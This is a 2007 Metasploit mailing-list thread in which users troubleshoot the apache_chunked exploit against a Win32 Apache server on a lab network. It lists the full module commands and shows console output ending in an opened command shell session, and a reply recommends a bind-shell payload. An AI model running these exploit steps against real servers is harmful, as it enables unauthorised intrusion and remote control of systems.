[framework] Problem with Apache Win32 Chunked Encoding
Kurt Grutzmacher
grutz at jingojango.net
Thu Nov 1 14:57:43 CDT 2007
Your PAYLOAD won't work with CMD=calc.exe. You're exploiting a service
that doesn't have a GUI component attached and so you won't get a
response back when you fire the exploit at it.
Use a different PAYLOAD like windows/shell/bind_tcp instead.
On Thu, Nov 01, 2007 at 09:18:26AM +0100, bluefoxy wrote:
> Thank you Patrick, I try to setting VHOST, but not working.
> I try both in VMware and on a real network, some error.
>
> My command's list is, Apache is in 192.168.1.80, metasploit in
> 192.168.1.30:
>
> use windows/http/apache_chunked
> set RHOST 192.168.1.80
> set LHOST 192.168.1.30
> set VHOST 192.168.1.80
> set TARGET 4
> set CMD calc.exe
> set PAYLOAD windows/exec
> exploit
>
> Can you list your command's list?
> Thanks.
>
> bluefoxy
>
>
>
> Patrick Webster ha scritto:
>> Are you sending traffic via a transparent proxy? You may need to set VHOST
>> to get past it.
>>
>> Works ok here - though a different target.
>>
>> msf exploit(apache_chunked) > rcheck
>> [*] Serer is probably not vulnerable:
>> [*] The target is not exploitable.
>> msf exploit(apache_chunked) > rexploit
>> [*] Started reverse handler
>> [*] Trying Apache.org <http://apache.org/> Build 1.3.9-> 1.3.19 [
>> 0x00401151/6 ]
>> [*] Trying Apache.org <http://apache.org/> Build 1.3.9->1.3.19 [
>> 0x00401151/2 ]
>> [*] Trying Apache.org <http://apache.org/> Build 1.3.9->1.3.19 [
>> 0x00401151/0 ]
>> [*] Trying Apache.org <http://apache.org/> Build 1.3.9->1.3.19 [
>> 0x00401151/4 ]
>> [*] Trying Apache.org <http://apache.org/> Build 1.3.9->1.3.19 [
>> 0x00401151/1 ]
>> [*] Trying Apache.org <http://apache.org/> Build 1.3.9- >1.3.19 [
>> 0x00401151/3 ]
>> [*] Trying Apache.org <http://apache.org/> Build 1.3.9->1.3.19 [
>> 0x00401151/5 ]
>> [*] Command shell session 1 opened ( 192.168.146.12:4444
>> <http://192.168.146.12:4444/> -> 192.168.146.13:1050
>> <http://192.168.146.13:1050/>)
>>
>> -Patrick
>> ------------------------------------------------------------------------
>>
>> No virus found in this incoming message.
>> Checked by AVG Free Edition. Version: 7.5.503 / Virus Database:
>> 269.15.12/1098 - Release Date: 29/10/2007 9.28
>>
>
--
..:[ grutz at jingojango dot net ]:..
GPG fingerprint: 5FD6 A27D 63DB 3319 140F B3FB EC95 2A03 8CB3 ECB4
"There's just no amusing way to say, 'I have a CISSP'."
More information about the framework
mailing list